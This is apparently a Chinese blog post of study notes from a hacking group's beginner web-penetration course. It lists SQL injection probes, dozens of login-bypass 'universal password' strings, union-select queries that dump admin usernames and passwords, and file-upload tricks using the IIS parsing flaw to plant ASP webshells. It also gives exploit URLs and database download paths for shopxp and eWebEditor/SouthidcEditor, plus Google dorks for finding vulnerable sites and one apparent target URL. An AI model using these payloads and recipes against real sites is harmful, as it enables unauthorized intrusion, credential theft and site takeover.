(入门级别的课程,看看,写了点儿笔记)
XX渗透小组教程
1、啊D,明小子思路: 找注入点,检测表段,检测字段,检测内容,找后台
2、webshell的介绍
asp大马
3、数据库备份拿webshell
上传大马(图片格式)
备份为asa、asp格式
4、webshell的注意点
大马格式的更改
asp
asa
cdx
cer
5、手工注入
and 1=1
and 1=2
6、菜刀的使用教程
7、万能密码
asp aspx万能密码
1:'or'='or'
2:'.).or.('.a.'='.a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:"or "a"="a
admin'or 1=1#
PHP万能密码
admin'/*
密码*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--
8、旁注的讲解
思路:找到一台主机下面的其他网站,先渗透一个,再入侵其他站点
上传文件
a.asp;1.jpg // iis的解析漏洞
9 动感上传漏洞
谷歌搜索inurl:shopxp_news.asp?id=87
http://www.trhm163.com/shopxp_news.asp?id=87
shopxp漏洞利用代码:
爆库:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
后台admin/login.asp
上传点upfilepic_get.asp?formname=myform&editname=upfilepic&uppath=img_shopxp/upfilepic&filelx=jpg
利用动感购物上传漏洞, 进行拿webshell
10 图片上传拿shell
(一个教育系统的上传漏洞)
谷歌:高校现代教学管理系统
/ftb.imagegallery.aspx
/images/xfbm.asp;xfbm.jpg
xfbm.asp;xfbm.jpg
11 提权拿服务器
php网站,直接上传cmd,执行命令
12 审查元素
直接更改value=asp 再上传
13 爆破账号密码
判断字段长度
order by 10
union select 1,2,3,4,5,6,7,8,9,10 from admin
union select 1,username,password,4,5,6,7,8,9,10 from admin
14 IP代理
花刺代理验证
15 ewebeditor 编辑器 拿webshell
下载数据库
/ewebeditor/db/ewebeditor.mdb
登录后台
/ewebeditor/admin/login.asp
/ewebeditor/admin_login.asp
样式管理
\eWebEditor\Admin_Style.asp
新建样式
图片类型中加入asp
显示路径删除
设置此样式的工具栏
新增工具栏
按钮设置
添加上传图片的按钮
样式预览
上传自己的asp大马
southidceditor编辑器一般以ewebeditor v2.8.0版内核修改
可以利用的链接
/southidceditor/datas/southidceditor.mdb
/southidceditor/admin/admin_login.asp
/southidceditor/popup.asp
/southidceditor/login.asp
/Southidceditor/admin_style.asp?action=copy&id=14
/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
/admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
17 简单上传漏洞的利用
首先到IE里面改一下配置--然后找到活动脚本选择禁用--然后全部确定
关键词:inurl:xxhs.asp?classid=
上传地址:admin_manage/upfile1.asp
上传后得到的马地址:admin_manage/image/201354125012.asp
18 Fyblogs网站管理系统漏洞
谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?
万能密码:'or'='or'
一个小孩做的课程,没什么实战价值, 全部为asp的渗透, 回想起以前看这种教程的日子, 2小时看了一下, 打发下时间!!
0则评论给“玄风小组渗透笔记”